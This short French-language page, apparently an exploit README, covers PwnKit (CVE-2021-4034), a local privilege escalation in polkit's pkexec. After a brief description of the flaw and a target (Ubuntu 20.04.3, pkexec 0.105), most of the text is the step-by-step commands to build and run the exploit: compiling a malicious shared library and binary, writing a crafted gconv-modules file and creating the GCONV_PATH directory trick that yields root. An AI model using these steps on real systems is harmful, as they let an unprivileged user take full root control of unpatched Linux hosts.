
PwnKit - Vulnérabilité d'élévation de privilèges locaux découverte dans pkexec de polkit (CVE-2021-4034)
L'équipe de recherche Qualys a découvert une vulnérabilité de corruption mémoire dans pkexec de polkit, un programme SUID-root installé par défaut sur toutes les principales distributions Linux. Cette vulnérabilité facilement exploitable permet à tout utilisateur non privilégié d'obtenir les privilèges root complets sur un hôte vulnérable en exploitant cette vulnérabilité dans sa configuration par défaut.
Ubuntu 20.04.3 LTS x86_64
Version de pkexec 0.105
mkdir /tmp/pwnkit_lpe/
gcc -shared -o /tmp/pwnkit_lpe/pwnkit.so -fPIC ./library.c
gcc ./exploit.c -o /tmp/pwnkit_lpe/pwnkit
echo "module UTF-8// PWNKIT// pwnkit 1" > /tmp/pwnkit_lpe/gconv-modules
mkdir -p "/tmp/pwnkit_lpe/GCONV_PATH=."
cp /usr/bin/true "/tmp/pwnkit_lpe/GCONV_PATH=./pwnkit.so:."
cd /tmp/pwnkit_lpe/
./pwnkit